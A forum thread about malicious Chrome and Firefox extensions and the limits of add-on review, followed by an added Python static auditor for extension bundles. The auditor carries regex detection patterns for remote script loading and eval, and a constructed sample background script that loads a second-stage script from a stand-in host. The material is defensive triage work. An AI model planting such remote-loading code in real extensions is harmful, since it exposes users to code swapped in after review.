
Yes. Mozilla also allows that, which is really sleazy for Mozilla.



Google deletes them fairly quickly, at least the couple of times I heard of these things or removed them from friends'/colleagues' computers they were already gone from the Chrome Web Store. That Mozilla bug you linked in another comment reads like an awfully misguided application of policy.

One of these extensions I came across automatically closed about:extensions every time I opened it to prevent uninstallation. Eventually I went through the Chrome task manager, killing extensions one by one until I found the right one by trial and error. Very frustrating to debug.


I don't think it's sleazy. While Mozilla does review all add-ons, it's hard to restrict what an extension can do right now, since they can access internal APIs and there isn't really a permission system to speak of.

Additionally, JS is a dynamic language so it's difficult to provide adequate automated scanning for malicious intent. Even so, extension authors can be quite clever in how they hide malicious behavior, especially if there's financial reward involved.

WebExtensions (https://wiki.mozilla.org/WebExtensions) add a permission system, have a much smaller attack surface, and should help to alleviate this problem. This combined with automated scanning + human review and

For Chrome, I think Google prefers a combination of automated scanning and quick response, without upfront human review (based on https://static.googleusercontent.com/media/research.google.c...)


Uhm, Mozilla does a code review of every extension or update to an extension before it gets published on AMO, so it should hardly be possible for a malicious third party to do malicious things...


There's an outfit called WIPS which buys up abandoned Firefox add-ons and puts adware and spyware in them.[1] BlockSite [2] is an example. This was approved by Mozilla AMO.[3]

[1] http://www.ghacks.net/2013/03/12/mozilla-needs-a-new-audit-p...
[2] https://addons.mozilla.org/en-US/firefox/addon/blocksite/rev...
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=903799


It's a hard problem as many extensions do the equivalent of loading in a script from a remote site as part of their start-up process (consider an adblocker that regularly pulls down and updates its list of ad definitions).

You could imagine that a malicious company would put through a "clean" version for testing and then once approved swap the script for the one loading malware.
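The two review problems raised in this thread, an add-on whose permissions let it do far more than its purpose needs, and an add-on that looks clean in a snapshot but fetches and executes script from a remote site after approval, are the kind of thing a reviewer can at least surface mechanically before spending human time. The following is an added example, not code from the thread or from Mozilla's AMO review tooling: a small static auditor for an unpacked WebExtension bundle that flags broad entries in `manifest.json` `permissions`, a `content_security_policy` that permits `eval` or remote script sources, and source lines that point a script element, `importScripts()`, `eval()` or `new Function()` at code not shipped in the bundle. The `BROAD_PERMISSIONS` set and the regex heuristics are my own choices, and the sample extension written to a temporary directory is constructed for the example.

```python
"""Added example, not from the thread: a small static auditor for a
WebExtension bundle.  It reports the two things the comments above raise:
broad permissions in manifest.json, and code that loads or evaluates script
from a remote site at run time (the case a one-time source review cannot
vouch for).  Everything below, including the sample extension, is constructed."""
import json
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# Assumed list of permissions worth a second look in review; tune per policy.
BROAD_PERMISSIONS = {
    "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
    "webRequest", "webRequestBlocking", "nativeMessaging", "debugger",
}

# Heuristic source patterns for remotely loaded or dynamically evaluated code.
REMOTE_CODE_PATTERNS = [
    (re.compile(r"""\.src\s*=\s*["']https?://"""), "script element pointed at remote URL"),
    (re.compile(r"""<script[^>]+src=["']https?://""", re.I), "remote <script> tag in bundled HTML"),
    (re.compile(r"""importScripts\s*\(\s*["']https?://"""), "importScripts() from remote URL"),
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bnew\s+Function\s*\("), "new Function()"),
]


def audit_manifest(manifest: dict) -> list:
    """Flag broad permissions and a CSP that permits eval or remote script sources."""
    findings = []
    for perm in manifest.get("permissions", []):
        if perm in BROAD_PERMISSIONS:
            findings.append(f"manifest.json: broad permission {perm!r}")
    csp = manifest.get("content_security_policy", "")
    if "'unsafe-eval'" in csp or re.search(r"script-src[^;]*https?://", csp):
        findings.append("manifest.json: content_security_policy allows eval or remote script")
    return findings


def audit_source(relpath: str, text: str) -> list:
    """Report each line of a .js/.html file that matches a remote-code pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, label in REMOTE_CODE_PATTERNS:
            if pattern.search(line):
                findings.append(f"{relpath}:{lineno}: {label}")
    return findings


def audit_extension(root: Path) -> list:
    """Walk an unpacked extension directory and collect all findings."""
    findings = []
    manifest_path = root / "manifest.json"
    if manifest_path.is_file():
        findings += audit_manifest(json.loads(manifest_path.read_text()))
    else:
        findings.append("manifest.json: missing")
    for path in sorted(root.rglob("*")):
        if path.suffix in (".js", ".html"):
            findings += audit_source(path.relative_to(root).as_posix(), path.read_text())
    return findings


# Constructed sample: an ad-blocker-style add-on whose update routine also pulls
# a second-stage script from a remote host, which is exactly what a reviewer
# looking at a "clean" snapshot would not see executing.
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "Example Blocker (constructed)",
        "version": "1.0",
        "permissions": ["storage", "<all_urls>", "webRequest"],
        "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
    }),
    "background.js": "\n".join([
        "// constructed: refresh the block list, then load a second-stage script",
        "fetch('https://example.invalid/list.json').then(r => r.json());",
        "const s = document.createElement('script');",
        "s.src = 'https://example.invalid/update.js';",
        "document.head.appendChild(s);",
    ]),
    "options.html": '<html><body><script src="options.js"></script></body></html>',
}


def audit_sample_extension() -> list:
    """Write the constructed sample to a temp dir and audit it."""
    with TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, content in SAMPLE_FILES.items():
            (root / name).write_text(content)
        return audit_extension(root)


if __name__ == "__main__":
    for finding in audit_sample_extension():
        print(finding)
```

Run against the constructed sample, the auditor reports the `<all_urls>` and `webRequest` permissions, the `'unsafe-eval'` CSP, and `background.js` line 4, while the local `<script src="options.js">` in `options.html` is left alone. The point is triage rather than verdict: an ad blocker legitimately downloads data, so a hit on a remote fetch is a prompt to confirm that what comes back is treated as data and not executed, and the remote-script checks cannot see what a server will serve after approval, which is why runtime controls such as the CSP check and a narrow permission set matter more than any one review of the source.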



